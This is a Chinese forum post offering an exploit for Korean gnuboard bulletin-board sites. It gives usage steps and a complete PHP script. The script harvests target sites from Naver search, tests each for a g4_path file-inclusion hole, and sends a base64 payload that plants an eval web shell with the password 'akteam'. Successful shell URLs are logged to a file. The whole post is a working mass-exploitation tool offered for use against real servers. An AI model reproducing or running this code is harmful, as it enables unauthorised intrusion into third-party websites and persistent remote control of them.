韩国gnuboard论坛漏洞EXP及利用方法
1.本机搭建PHP环境2.将EXP程序保存为akt.php
3.CMD下执行php akt.php
4.产生的akt.txt中记录成功URL
5.http://目标URL/data/hardison.php 密码:akteam 用PHP连接
EXP:
复制代码
<?php
echo" +----------------------------------------------------------------+\r\n";
echo" [url]http://www.3ast.com.cn[/url]\r\n";
echo" +----------------------------------------------------------------+\r\n";
for ($ii=1;$ii<=99;$ii++)
{
$c=(int)$ii*10+1;
$a="web.search.naver.com";
$b="/search.naver?where=webkr&query=bbs/board.php&xc=&docid=0&lang=all&st=s&fd=2&start=".$c."&display=10
&&qvt=0&sm=tab_pge";
get($a,$b);
}
function get($host,$file)
{
$fp = fsockopen($host, 80, $errno, $errstr, 10);
if (!$fp) {
echo "SocketError: $errstr ($errno)\n";
return false;
}
$get = "GET $file HTTP/1.1\r\n";
$get .= "Host: $host\r\n";
$get .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5\r\n";
$get .= "Referer: http://$host\r\n";
$get .= "Connection: Close\r\n";
$get .= "Cookie: nsr_acl_nautocomplete=1; NB=GIYTSNJYHE4DKMJX; NNB=AIUHYPM7OXJUS; page_uid=fOL9uloi5UNssbPX/M8sss--100532; _naver_usersession_=SdN7qBY700kAAAKIwME\r\n\r\n";
fwrite($fp, $get);
$response=stream_get_contents($fp);
preg_match_all("(http://[-\w.]+(:\d+)?(/([\w/_.]*)?)?bbs\/board\.php)",$response,$put);
for ($i=0;$i<count($put[0]);$i++)
{
$a=(int)$i*3;
fuck($put[0][$a]);
//echo count($put[0]);
//print_r($put[0]);
//fuck($put[0][$i]);
break;
}
fclose($fp);
}
function fuck($ok)
{
$a=preg_replace(’(bbs\/board.php)’,’’,$ok);
$file=$a."common.php?g4_path=/tmp2345";
$xxx=$a."common.php?g4_path=data:;base64,PD9mcHV0cyhmb3BlbignLi9kYXRhL2hhcmRpc29uLnBocCcsJ3crJyksJzw/
cGhwIEBldmFsKCRfUE9TVFtob29lZHVdKTtlY2hvICJoYXJkaXNvbiBiaWcgYmlnICI7Pz4nKTs/Pg==";
$shell=$a."data/akteam.php";
$target=parse_url($ok);
$sitepath=$target[’host’];
$xx=@file_get_contents($file);
if(eregi("(Warning)",$xx)&&eregi("(tmp)",$xx))
{
print $sitepath." Vulnerability yes"."\r\n";
@file_get_contents($xxx);
$oksehll=@file_get_contents($shell);
if(!eregi("(\\02345)",$xx))
{
print $sitepath." ok"."\r\n";
}
if (eregi("(akteam)",$oksehll))
{
print $shell." pass:akteam"."\r\n";
$axx="\r\n".$shell;
$sh=fopen(’akt.txt’,"a+");
fwrite($sh,$axx);
fclose($sh);
}
}
else
{
print $sitepath." Vulnerability no"."\r\n";
}
}
?>
页:
[1]